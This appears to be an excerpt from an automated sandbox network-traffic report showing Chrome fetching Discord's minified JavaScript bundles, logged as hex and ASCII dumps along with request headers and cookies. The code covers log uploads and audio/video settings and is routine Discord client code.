                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 39 37 33 34 39 22 29 2c 6e 28 22 36 36 37 35 33 36 22 29 2c 6e 28 22 36 39 30 33 34 31 22 29 3b 76 61 72 20 6f 3d 6e 28 22 36 30 35 32 35 30 22 29 2c 61 3d 6e 28 22 34 34 36 38 32 35 22 29 2e 42 75 66 66 65 72 3b 6c 65 74 20 6c 3d 6e 65 77 20 6f 2e 64 65 66 61 75 6c 74 28 22 42 6c 69 6e 64 49 44 22 29 3b 63 6c 61 73 73 20 72 7b 61 73 79 6e 63 20 62 6c 69 6e 64 28 74 29 7b 6c 65 74 20 65 3d 61 77 61 69 74 20 74 68 69 73 2e 6b 65 79 2c 6e 3d 6e 65 77 20 42 69 67 55 69 6e 74 36 34 41 72 72 61 79 28 5b 42 69 67 49 6e 74 28 74 29 5d 29 2c 6f 3d 61 77 61 69 74 20 63 72 79 70 74 6f 2e 73 75 62 74 6c 65 2e 73 69 67 6e 28 22 48 4d 41 43 22 2c 65 2c 6e 2e 62 75 66 66 65 72 29 3b 72 65 74 75 72 6e 20 72 2e 74 72 75 6e 63 61 74 65 28 6f 29 2e 74 6f 53 74 72 69 6e 67
                                                                          Data Ascii: 97349"),n("667536"),n("690341");var o=n("605250"),a=n("446825").Buffer;let l=new o.default("BlindID");class r{async blind(t){let e=await this.key,n=new BigUint64Array([BigInt(t)]),o=await crypto.subtle.sign("HMAC",e,n.buffer);return r.truncate(o).toString
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 65 62 75 67 4c 6f 67 73 45 72 72 6f 72 28 6c 2e 55 70 6c 6f 61 64 45 72 72 6f 72 43 6f 64 65 73 2e 4e 4f 5f 46 49 4c 45 29 3b 74 72 79 7b 6c 65 74 20 74 3d 7b 65 78 74 72 61 49 6e 66 6f 3a 65 2c 6d 65 64 69 61 45 6e 67 69 6e 65 53 74 61 74 65 3a 72 2e 64 65 66 61 75 6c 74 2e 67 65 74 53 74 61 74 65 28 29 7d 3b 6e 3d 61 77 61 69 74 20 61 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 73 2e 45 6e 64 70 6f 69 6e 74 73 2e 44 45 42 55 47 5f 4c 4f 47 53 28 73 2e 44 65 62 75 67 4c 6f 67 43 61 74 65 67 6f 72 79 2e 52 54 43 29 2c 61 74 74 61 63 68 6d 65 6e 74 73 3a 5b 2e 2e 2e 6f 2e 6d 61 70 28 74 3d 3e 28 7b 6e 61 6d 65 3a 74 2e 6e 61 6d 65 2c 66 69 6c 65 3a 74 2c 66 69 6c 65 6e 61 6d 65 3a 74 2e 6e 61 6d 65 7d 29 29 2c 7b 6e 61 6d 65 3a 22 6d 65 64 69
                                                                          Data Ascii: ebugLogsError(l.UploadErrorCodes.NO_FILE);try{let t={extraInfo:e,mediaEngineState:r.default.getState()};n=await a.default.post({url:s.Endpoints.DEBUG_LOGS(s.DebugLogCategory.RTC),attachments:[...o.map(t=>({name:t.name,file:t,filename:t.name})),{name:"medi
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 45 7d 2c 75 70 6c 6f 61 64 43 61 6c 6c 73 63 6f 70 65 4c 6f 67 46 69 6c 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 7d 7d 29 2c 6e 28 22 32 32 32 30 30 37 22 29 3b 76 61 72 20 6f 3d 6e 28 22 38 37 32 37 31 37 22 29 2c 61 3d 6e 28 22 38 36 39 35 38 36 22 29 2c 6c 3d 6e 28 22 34 39 36 37 31 22 29 2c 72 3d 6e 28 22 38 39 30 37 34 37 22 29 2c 69 3d 6e 28 22 32 35 34 34 39 30 22 29 2c 63 3d 6e 28 22 38 32 31 33 31 36 22 29 2c 73 3d 6e 28 22 36 30 35 32 35 30 22 29 2c 75 3d 6e 28 22 38 33 36 34 30 33 22 29 2c 64 3d 6e 28 22 38 32 35 32 38 37 22 29 2c 67 3d 6e 28 22 39 32 39 33 33 31 22 29 2c 70 3d 6e 28 22 34 39 31 31 31 22 29 3b 6c 65 74 20 66 3d 6e 65 77 20 73 2e 64 65 66 61 75 6c 74 28 22 44 65 62 75 67 55 70 6c 6f 61 64 4d 61 6e 61 67
                                                                          Data Ascii: E},uploadCallscopeLogFiles:function(){return L}}),n("222007");var o=n("872717"),a=n("869586"),l=n("49671"),r=n("890747"),i=n("254490"),c=n("821316"),s=n("605250"),u=n("836403"),d=n("825287"),g=n("929331"),p=n("49111");let f=new s.default("DebugUploadManag
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 3d 61 77 61 69 74 20 6c 2e 64 65 66 61 75 6c 74 2e 66 69 6c 65 4d 61 6e 61 67 65 72 2e 67 65 74 43 61 6c 6c 73 63 6f 70 65 4c 6f 67 46 69 6c 65 73 28 61 29 3b 61 77 61 69 74 20 4c 28 72 2c 63 29 7d 63 61 74 63 68 28 74 29 7b 66 2e 65 72 72 6f 72 28 22 75 70 6c 6f 61 64 43 61 6c 6c 73 63 6f 70 65 4c 6f 67 73 3a 20 45 72 72 6f 72 20 75 70 6c 6f 61 64 69 6e 67 20 6c 6f 67 73 20 22 2e 63 6f 6e 63 61 74 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 74 65 78 74 29 2c 74 29 7d 7d 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 4c 28 74 2c 65 29 7b 74 72 79 7b 69 66 28 30 3d 3d 3d 65 2e 6c 65 6e 67 74 68 29 7b 66 2e 65 72 72 6f 72 28 22 75 70 6c 6f 61 64 43 61 6c 6c 73 63 6f 70 65 4c 6f 67 46 69 6c 65 73 3a 20 4e 6f 20 66 69 6c 65 73 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: =await l.default.fileManager.getCallscopeLogFiles(a);await L(r,c)}catch(t){f.error("uploadCallscopeLogs: Error uploading logs ".concat(null==t?void 0:t.text),t)}}}async function L(t,e){try{if(0===e.length){f.error("uploadCallscopeLogFiles: No files found.
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 66 79 28 28 30 2c 64 2e 64 65 66 61 75 6c 74 29 28 29 2c 76 6f 69 64 20 30 2c 32 29 2c 22 5c 6e 20 20 20 20 4c 6f 67 73 3a 5c 6e 20 20 20 20 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 5c 6e 5c 6e 20 20 20 20 53 79 73 74 65 6d 20 6c 6f 67 73 3a 5c 6e 20 20 20 20 22 29 2e 63 6f 6e 63 61 74 28 6e 2c 22 5c 6e 5c 6e 20 20 20 20 50 75 73 68 20 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 3a 5c 6e 20 20 20 20 22 29 2e 63 6f 6e 63 61 74 28 61 2c 22 5c 6e 20 20 20 20 22 29 3b 63 2e 63 6c 65 61 72 28 29 3b 6c 65 74 20 73 3d 70 2e 45 6e 64 70 6f 69 6e 74 73 2e 44 45 42 55 47 5f 4c 4f 47 28 74 2c 22 64 69 73 63 6f 72 64 5f 61 70 70 5f 6c 6f 67 73 22 29 3b 61 77 61 69 74 20 6f 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 73 2c 62 6f 64 79 3a 69 2c 72 65 74 72 69 65
                                                                          Data Ascii: fy((0,d.default)(),void 0,2),"\n Logs:\n ").concat(e,"\n\n System logs:\n ").concat(n,"\n\n Push Notifications:\n ").concat(a,"\n ");c.clear();let s=p.Endpoints.DEBUG_LOG(t,"discord_app_logs");await o.default.post({url:s,body:i,retrie
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 65 74 75 72 6e 20 6f 7d 7d 29 7d 2c 39 32 39 33 33 31 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 2c 6e 28 22 37 38 31 37 33 38 22 29 2c 6e 28 22 34 32 34 39 37 33 22 29 2c 6e 28 22 32 32 32 30 30 37 22 29 3b 76 61 72 20 6f 3d 6e 28 22 39 31 37 33 35 31 22 29 2c 61 3d 6e 2e 6e 28 6f 29 2c 6c 3d 6e 28 22 31 30 32 30 35 33 22 29 2c 72 3d 6e 28 22 34 38 37 32 36 39 22 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 6c 65 74 20 65 3d 21 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 7c 7c 61 72 67 75 6d
                                                                          Data Ascii: eturn o}})},929331:function(t,e,n){"use strict";n.r(e),n.d(e,{default:function(){return i}}),n("781738"),n("424973"),n("222007");var o=n("917351"),a=n.n(o),l=n("102053"),r=n("487269");function i(t){let e=!(arguments.length>1)||void 0===arguments[1]||argum
                                                                          2023-12-10 16:45:18 UTC1080INData Raw: 74 61 72 74 20 22 29 26 26 21 72 2e 69 6e 63 6c 75 64 65 73 28 22 52 55 4e 5f 4a 53 5f 42 55 4e 44 4c 45 22 29 26 26 6f 2e 68 61 73 28 72 2e 72 65 70 6c 61 63 65 28 22 53 74 61 72 74 20 22 2c 22 46 69 6e 69 73 68 20 22 29 29 2c 64 3d 72 2e 73 74 61 72 74 73 57 69 74 68 28 22 46 69 6e 69 73 68 20 22 29 26 26 21 72 2e 69 6e 63 6c 75 64 65 73 28 22 52 55 4e 5f 4a 53 5f 42 55 4e 44 4c 45 22 29 26 26 6f 2e 68 61 73 28 72 2e 72 65 70 6c 61 63 65 28 22 46 69 6e 69 73 68 20 22 2c 22 53 74 61 72 74 20 22 29 29 3b 69 66 28 64 29 7b 61 3d 61 2e 73 75 62 73 74 72 69 6e 67 28 32 29 3b 6c 65 74 20 74 3d 6c 2e 70 6f 70 28 29 3b 6e 75 6c 6c 21 3d 74 26 26 28 69 3d 65 2e 74 69 6d 65 73 74 61 6d 70 2d 74 2e 74 69 6d 65 73 74 61 6d 70 2c 73 3d 73 7c 7c 69 3e 35 26 26 21 66
                                                                          Data Ascii: tart ")&&!r.includes("RUN_JS_BUNDLE")&&o.has(r.replace("Start ","Finish ")),d=r.startsWith("Finish ")&&!r.includes("RUN_JS_BUNDLE")&&o.has(r.replace("Finish ","Start "));if(d){a=a.substring(2);let t=l.pop();null!=t&&(i=e.timestamp-t.timestamp,s=s||i>5&&!f


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          314192.168.2.550051162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:18 UTC865OUTGET /assets/5593.7ea5e2c9f604c23670f3.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=R4LQ9eAOy65FjFKBoqbEAGdchuqmDzFj3MHXAoIITyo-1702226717665-0-604800000
                                                                          2023-12-10 16:45:18 UTC979INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 36 38 38 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 66 33 62 31 34 64 61 34 37 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:18 GMTContent-Type: application/javascriptContent-Length: 96882Connection: closeCF-Ray: 8336f51f3b14da47-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:18 UTC390INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 35 35 39 33 22 5d 2c 7b 32 30 33 34 37 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 37 32 65 61 61 35 39 36 30 34 32 30 34 32 62 65 36 32 35 39 2e 73 76 67 22 7d 2c 32 34 39 37 31 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 31 63 30 34 63 34 66 61 65 39 38 66 62 66 63 32 31 64 32 32 2e 73 76 67 22 7d 2c 31 34 34 32 36 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["5593"],{203472:function(e,t,n){"use strict";e.exports=n.p+"72eaa596042042be6259.svg"},249712:function(e,t,n){"use strict";e.exports=n.p+"1c04c4fae98fbfc21d22.svg"},144261:function(e,t
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 7d 2c 35 38 38 32 38 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 65 37 39 66 66 35 37 30 38 36 31 62 62 62 39 36 37 39 66 35 2e 73 76 67 22 7d 2c 32 34 32 34 31 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 32 39 33 30 36 64 65 38 39 35 33 34 37 31 39 35 34 30 33 35 2e 73 76 67 22 7d 2c 37 32 39 38 36 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 62 63 33 35 64 31 32 34 35 30 63 30 37 62 64 33 37 37 31 34 2e 73 76 67 22 7d 2c 36 32 39 31 30 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74
                                                                          Data Ascii: },588281:function(e,t,n){"use strict";e.exports=n.p+"e79ff570861bbb9679f5.svg"},242412:function(e,t,n){"use strict";e.exports=n.p+"29306de8953471954035.svg"},729861:function(e,t,n){"use strict";e.exports=n.p+"bc35d12450c07bd37714.svg"},629109:function(e,t
                                                                          2023-12-10 16:45:18 UTC1251INData Raw: 43 6f 6e 74 65 78 74 54 79 70 65 73 2e 44 45 46 41 55 4c 54 2c 73 79 6e 63 52 65 6d 6f 74 65 3a 74 3d 21 30 7d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 3b 21 6d 28 29 26 26 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 41 55 44 49 4f 5f 54 4f 47 47 4c 45 5f 53 45 4c 46 5f 44 45 41 46 22 2c 63 6f 6e 74 65 78 74 3a 65 2c 73 79 6e 63 52 65 6d 6f 74 65 3a 74 7d 29 7d 2c 74 6f 67 67 6c 65 4c 6f 63 61 6c 4d 75 74 65 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b
                                                                          Data Ascii: ContextTypes.DEFAULT,syncRemote:t=!0}=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{};!m()&&a.default.dispatch({type:"AUDIO_TOGGLE_SELF_DEAF",context:e,syncRemote:t})},toggleLocalMute(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 5d 3a 66 2e 4d 65 64 69 61 45 6e 67 69 6e 65 43 6f 6e 74 65 78 74 54 79 70 65 73 2e 44 45 46 41 55 4c 54 3b 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 41 55 44 49 4f 5f 53 45 54 5f 4c 4f 43 41 4c 5f 50 41 4e 22 2c 63 6f 6e 74 65 78 74 3a 72 2c 75 73 65 72 49 64 3a 65 2c 6c 65 66 74 3a 74 2c 72 69 67 68 74 3a 6e 7d 29 7d 2c 73 65 74 4d 6f 64 65 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 66 2e 4d
                                                                          Data Ascii: ]:f.MediaEngineContextTypes.DEFAULT;a.default.dispatch({type:"AUDIO_SET_LOCAL_PAN",context:r,userId:e,left:t,right:n})},setMode(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:f.M
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 2c 74 29 7b 21 6d 28 29 26 26 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 41 55 44 49 4f 5f 53 45 54 5f 4e 4f 49 53 45 5f 53 55 50 50 52 45 53 53 49 4f 4e 22 2c 65 6e 61 62 6c 65 64 3a 65 2c 6c 6f 63 61 74 69 6f 6e 3a 74 7d 29 7d 2c 73 65 74 4e 6f 69 73 65 43 61 6e 63 65 6c 6c 61 74 69 6f 6e 28 65 2c 74 29 7b 21 6d 28 29 26 26 28 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 41 55 44 49 4f 5f 53 45 54 5f 4e 4f 49 53 45 5f 43 41 4e 43 45 4c 4c 41 54 49 4f 4e 22 2c 65 6e 61 62 6c 65 64 3a 65 2c 6c 6f 63 61 74 69 6f 6e 3a 74 7d 29 2c 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 41 55 44 49 4f 5f 53 45 54 5f 4e 4f 49 53 45 5f 53 55 50 50 52 45 53 53 49 4f 4e 22
                                                                          Data Ascii: ,t){!m()&&a.default.dispatch({type:"AUDIO_SET_NOISE_SUPPRESSION",enabled:e,location:t})},setNoiseCancellation(e,t){!m()&&(a.default.dispatch({type:"AUDIO_SET_NOISE_CANCELLATION",enabled:e,location:t}),a.default.dispatch({type:"AUDIO_SET_NOISE_SUPPRESSION"
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 65 7d 29 7d 2c 73 65 74 56 69 64 65 6f 45 6e 61 62 6c 65 64 28 65 29 7b 28 30 2c 73 2e 61 70 70 6c 79 49 6e 69 74 69 61 6c 56 69 64 65 6f 42 61 63 6b 67 72 6f 75 6e 64 4f 70 74 69 6f 6e 29 28 29 2c 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4d 45 44 49 41 5f 45 4e 47 49 4e 45 5f 53 45 54 5f 56 49 44 45 4f 5f 45 4e 41 42 4c 45 44 22 2c 65 6e 61 62 6c 65 64 3a 65 7d 29 7d 2c 73 65 74 47 6f 4c 69 76 65 53 6f 75 72 63 65 28 65 29 7b 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 71 75 61 6c 69 74 79 4f 70 74 69 6f 6e 73 29 21 3d 6e 75 6c 6c 26 26 28 30 2c 64 2e 74 72 61 63 6b 53 74 72 65 61 6d 53 65 74 74 69 6e 67 73 55 70 64 61 74 65 29 28 65 2e 71 75 61 6c 69 74 79 4f 70 74 69 6f 6e 73 2e 70 72 65 73 65 74 2c 65 2e
                                                                          Data Ascii: e})},setVideoEnabled(e){(0,s.applyInitialVideoBackgroundOption)(),a.default.dispatch({type:"MEDIA_ENGINE_SET_VIDEO_ENABLED",enabled:e})},setGoLiveSource(e){(null==e?void 0:e.qualityOptions)!=null&&(0,d.trackStreamSettingsUpdate)(e.qualityOptions.preset,e.
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 7b 74 79 70 65 3a 22 50 49 43 54 55 52 45 5f 49 4e 5f 50 49 43 54 55 52 45 5f 43 4c 4f 53 45 22 2c 69 64 3a 65 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 50 49 43 54 55 52 45 5f 49 4e 5f 50 49 43 54 55 52 45 5f 48 49 44 45 22 2c 69 64 3a 65 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 50 49 43 54 55 52 45 5f 49 4e 5f 50 49 43 54 55 52 45 5f 53 48 4f 57 22 2c 69 64 3a 65 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 50 49 43 54 55 52 45 5f 49 4e 5f 50 49 43 54 55 52 45 5f 4d 4f 56 45 22 2c 69 64 3a 65
                                                                          Data Ascii: {type:"PICTURE_IN_PICTURE_CLOSE",id:e})}function i(e){a.default.dispatch({type:"PICTURE_IN_PICTURE_HIDE",id:e})}function l(e){a.default.dispatch({type:"PICTURE_IN_PICTURE_SHOW",id:e})}function u(e,t){a.default.dispatch({type:"PICTURE_IN_PICTURE_MOVE",id:e
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 4b 45 44 2c 7b 74 79 70 65 3a 22 61 75 64 69 6f 22 2c 61 63 74 69 6f 6e 3a 65 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 53 28 29 7b 6c 65 74 20 65 3d 21 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3b 72 65 74 75 72 6e 20 68 28 29 3f 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 21 31 29 3a 28 75 2e 64 65 66 61 75 6c 74 2e 74 72 61 63 6b 28 6f 2e 41 6e 61 6c 79 74 69 63 45 76 65 6e 74 73 2e 50 45 52 4d 49 53 53 49 4f 4e 53 5f 52 45 51 55 45 53 54 45 44 2c 7b 74 79 70 65 3a 22 61 75 64 69 6f 22 7d 29 2c 6c 2e 64 65 66 61 75 6c 74 2e 67 65 74 4d 65 64 69 61 45 6e 67 69 6e 65 28 29 2e 65 6e 61 62 6c 65 28 29 2e 74 68 65 6e 28 28 29 3d 3e
                                                                          Data Ascii: KED,{type:"audio",action:e})}function S(){let e=!(arguments.length>0)||void 0===arguments[0]||arguments[0];return h()?Promise.resolve(!1):(u.default.track(o.AnalyticEvents.PERMISSIONS_REQUESTED,{type:"audio"}),l.default.getMediaEngine().enable().then(()=>
                                                                          2023-12-10 16:45:18 UTC1369INData Raw: 2c 74 29 29 26 26 28 77 69 6e 64 6f 77 2e 67 65 74 53 65 6c 65 63 74 69 6f 6e 28 29 2e 72 65 6d 6f 76 65 41 6c 6c 52 61 6e 67 65 73 28 29 2c 6e 28 29 29 7d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 72 2c 21 30 29 2c 6e 75 6c 6c 3d 3d 3d 28 74 3d 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6f 6e 74 65 78 74 6d 65 6e 75 22 2c 72 2c 21 30 29 2c 28 29 3d 3e 7b 76 61 72 20 65 2c 74 3b 6e 75 6c 6c 3d 3d 3d 28 65 3d 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 29 7c 7c 76 6f
                                                                          Data Ascii: ,t))&&(window.getSelection().removeAllRanges(),n())};return null===(e=a.ownerDocument)||void 0===e||e.addEventListener("click",r,!0),null===(t=a.ownerDocument)||void 0===t||t.addEventListener("contextmenu",r,!0),()=>{var e,t;null===(e=a.ownerDocument)||vo


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          315192.168.2.550048162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:18 UTC866OUTGET /assets/55348.29e83ba0718684f2c9af.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=R4LQ9eAOy65FjFKBoqbEAGdchuqmDzFj3MHXAoIITyo-1702226717665-0-604800000
